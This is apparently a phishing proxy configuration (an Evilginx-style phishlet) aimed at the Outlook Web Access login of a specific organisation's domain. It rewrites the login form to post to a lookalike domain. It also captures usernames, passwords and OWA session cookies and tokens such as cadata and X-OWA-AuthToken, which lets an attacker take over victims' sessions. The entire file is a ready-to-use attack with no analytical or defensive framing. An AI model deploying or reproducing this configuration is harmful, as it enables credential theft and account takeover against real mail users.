name: "owa-exchange"
author: "maint"
min_ver: "2.3"
proxy_hosts:
  - {phish_sub: "mail", orig_sub: "mail", domain: "maintlatam.com", session: true, is_landing: true}
  - {phish_sub: "autodiscover", orig_sub: "autodiscover", domain: "maintlatam.com"}
sub_filters:
  - {triggers_on: "mail.maintlatam.com", orig_sub: "mail", domain: "maintlatam.com", search: "action=\"/owa/auth.owa\"", replace: "action=\"https://mail.socmaintlatam.com/owa/auth.owa\"", mimes: ["text/html"]}
  - {triggers_on: "mail.maintlatam.com", orig_sub: "mail", domain: "maintlatam.com", search: "name=\"destination\" value=\"https://mail.maintlatam.com/owa/\"", replace: "name=\"destination\" value=\"https://mail.socmaintlatam.com/owa/\"", mimes: ["text/html"]}

auth_tokens:
  - domain: ".maintlatam.com"
    keys: ["cadata", "cadataTTL", "SecurityToken", "X-OWA-CANARY", "X-OWA-AuthToken"]
credentials:
  username:
    key: "username"
    type: "post"
  password:
    key: "password"
    type: "post"
login:
  domain: "mail.maintlatam.com"
  path: "/owa/auth.owa"
  method: "post"
  redirect_delay: 3000
  follow_redirects: true
force_post:
  - path: "/owa/auth.owa"
    search:
      - "username"
      - "password"
    force: true
session:
  cookies:
    - "cadata"
    - "cadataTTL"
    - "SecurityToken"
    - "X-OWA-CANARY"
    - "X-OWA-AuthToken"
